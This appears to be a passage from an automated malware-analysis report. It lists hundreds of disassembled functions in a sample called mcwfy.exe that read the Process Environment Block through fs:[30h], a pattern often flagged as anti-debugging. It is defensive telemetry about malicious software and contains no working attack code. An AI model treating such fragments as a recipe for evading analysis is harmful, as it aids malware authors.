          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B15210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B33A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BCB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BCB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BA4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B42397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BCD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BC3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BAFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BCFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BCFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B48E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B2766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00BDAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00BDAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B28794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B4E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B3B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B3B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B3F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00BAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00BAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00BE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00BE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 3_2_00B2FF60 mov eax, dword ptr fs:[00000030h]
